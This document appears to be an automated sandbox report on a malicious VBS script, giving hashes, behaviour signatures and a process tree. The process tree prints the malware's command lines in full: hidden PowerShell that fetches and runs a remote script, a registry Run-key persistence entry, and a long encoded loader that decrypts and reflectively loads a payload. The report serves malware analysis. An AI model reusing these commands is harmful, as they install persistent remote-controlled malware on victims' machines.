Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-01-2025 08:25

General

  • Target

    UmnrNoAnyOpt.vbs

  • Size

    12.7MB

  • MD5

    f7650386857dd0d31fb2a1e984dfd3b5

  • SHA1

    f273746309e4dff543059ec934895108dd2b6244

  • SHA256

    acdcc9515147f1691ddb2c7cbd352a67ef6f0e57cb72ea593df2bd2fe01f0509

  • SHA512

    e8421e56ed514f38780d4c4d3261810c3b7374c3afad7016de0ef50905dba12d2661206162865da93ada5eeb733d9ed985fd2a4f205ee248a2ca3a3fa5607616

  • SSDEEP

    49152:BnxqEP6D/zp8K91y5+30k5xTZq+4+EtVGnKTSB4IpQsBtK+gvA9hZKwPBdko9cgD:C

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\UmnrNoAnyOpt.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:792
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2804
        • C:\Windows\system32\reg.exe
          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
          4⤵
          • Adds Run key to start application
          PID:2888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gZ2VjdGltY2RnYmpsb2x6a2lxcmptaGN0aHhxeHpnbW51ZWtiaW5hbigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0JFMEw2aUN3N3crTnBhVzcwNktsZ01UN3pxMkZHYXlReFkrWElkaHA4SEE9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCdmNGV6a1NJa2RhN1Ewcmk5R2VtSVF3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGZqbXNjcXVhYmZ3b2NjYXpjaW1rdmVlenB3cmtheGN2cWRkZHZrcXIoJHBhcmFtX3Zhcil7CUlFWCAnJGRwd3RreGtyZWx6emFxc2FmbWRneWt6ZGQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckYXl6eXhkcnN1Z2dpa3BybHpmcHljdWFsZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJHhqaGt0dHB0cWp6bHRoaGhoZ2psc3Z3bHU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkZHB3dGt4a3JlbHp6YXFzYWZtZGd5a3pkZCwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkeGpoa3R0cHRxanpsdGhoaGhnamxzdndsdS5Db3B5VG8oJGF5enl4ZHJzdWdnaWtwcmx6ZnB5Y3VhbGQpOwkkeGpoa3R0cHRxanpsdGhoaGhnamxzdndsdS5EaXNwb3NlKCk7CSRkcHd0a3hrcmVsenphcXNhZm1kZ3lremRkLkRpc3Bvc2UoKTsJJGF5enl4ZHJzdWdnaWtwcmx6ZnB5Y3VhbGQuRGlzcG9zZSgpOwkkYXl6eXhkcnN1Z2dpa3BybHpmcHljdWFsZC5Ub0FycmF5KCk7fWZ1bmN0aW9uIGFhd2ZqaGN5cG1yZ2ZzcWdraGlhaG5zdG1iam1hcWZmdGxuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckeWZrZWFmeW91enVraWJucXB0Z3NhZnhpcXZvcXpsYm12cHVuZm9xZD1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGF4eWhueHpmdnZjYnF0dXNoYm5lcmhvanlob3NoemthZGNyY2hwdXN3anVkaWF3Y3ZiPSR5ZmtlYWZ5b3V6dWtpYm5xcHRnc2FmeGlxdm9xemxibXZwdW5mb3FkLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGF4eWhueHpmdnZjYnF0dXNoYm5lcmhvanlob3NoemthZGNyY2hwdXN3anVkaWF3Y3ZiLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kbHpwaWprZmVjcGJtdnBsdnVybnlhYWlsbSA9ICRlbnY6VVNFUk5BTUU7JG5lYnBrbnZqa2Fmb2N4eHh2Y2d2cnZld3kgPSAnQzpcVXNlcnNcJyArICRsenBpamtmZWNwYm12cGx2dXJueWFhaWxtICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbmVicGtudmprYWZvY3h4eHZjZ3ZydmV3eTskcHdkbWo9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRuZWJwa252amthZm9jeHh4dmNndnJ2ZXd5KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkcXJ3IGluICRwd2RtaikgewlpZiAoJHFydy5TdGFydHNXaXRoKCc6OicpKQl7CQkkcmFmcXY9JHFydy5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kYWZ4YWRhaGt6cnJocmx1bmFtYmlyZG90endkcWN0dGpwZ249W3N0cmluZ1tdXSRyYWZxdi5TcGxpdCgnXCcpO0lFWCAnJGZmdWFwZ3ltYW5uYXlnYWdtaWhjeHFlYmh3cWhmeWhza3lvPWZqbXNjcXVhYmZ3b2NjYXpjaW1rdmVlenB3cmtheGN2cWRkZHZrcXIgKGdlY3RpbWNkZ2JqbG9semtpcXJqbWhjdGh4cXh6Z21udWVrYmluYW4gKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkYWZ4YWRhaGt6cnJocmx1bmFtYmlyZG90endkcWN0dGpwZ25bMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckaWdsbWJzcW9nbHZma2NuaGJoZHBvYXNzc3BxaGNmdnB6cnI9Zmptc2NxdWFiZndvY2NhemNpbWt2ZWV6cHdya2F4Y3ZxZGRkdmtxciAoZ2VjdGltY2RnYmpsb2x6a2lxcmptaGN0aHhxeHpnbW51ZWtiaW5hbiAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRhZnhhZGFoa3pycmhybHVuYW1iaXJkb3R6d2RxY3R0anBnblsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTthYXdmamhjeXBtcmdmc3Fna2hpYWhuc3RtYmptYXFmZnRsbiAkZmZ1YXBneW1hbm5heWdhZ21paGN4cWViaHdxaGZ5aHNreW8gJG51bGw7YWF3ZmpoY3lwbXJnZnNxZ2toaWFobnN0bWJqbWFxZmZ0bG4gJGlnbG1ic3FvZ2x2ZmtjbmhiaGRwb2Fzc3NwcWhjZnZwenJyICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2884

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\c.bat

    Filesize

    12.7MB

    MD5

    7a1c7d3da7cf792dda3fcb171347daa1

    SHA1

    fb4f7291f1e8c2d807f34e2e43f2bfa343f219a1

    SHA256

    f03344def4aff1dafd24bd5a4e5c6e505a92a1c30c6bf3d11de9fea8cf187a39

    SHA512

    bf3372f65d5019d08804ac0a5d2df16a25e7d11670f2bfdd332ca83d4e34fae5ca752a34b3158e1bafda34e018a3a4d0dcc64fbf6cff6326fa2ea916d4d44d21

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    60a8702ad4a36272a5c59c3c0d900233

    SHA1

    e3ff98485190f3d918fc398731b46596e50bd569

    SHA256

    38dcdfb04fbd6b7e17bf7bb92e4d8c2e4f07575a5a053d4b51da29920537aaa1

    SHA512

    c8d83e12f614793887ece1971fd04dc0a55fbac06f20ee8093054c911d4edc9abb597cd13995925a7605a1bd51b0488f0eb9c01b224d02ab3f470baadd69e1f9

  • memory/2804-19-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2804-16-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2804-15-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/2804-17-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2804-14-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2804-18-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2804-20-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2804-21-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2804-13-0x000007FEF55DE000-0x000007FEF55DF000-memory.dmp

    Filesize

    4KB

  • memory/2884-29-0x000000001B570000-0x000000001B852000-memory.dmp

    Filesize

    2.9MB

  • memory/2884-30-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB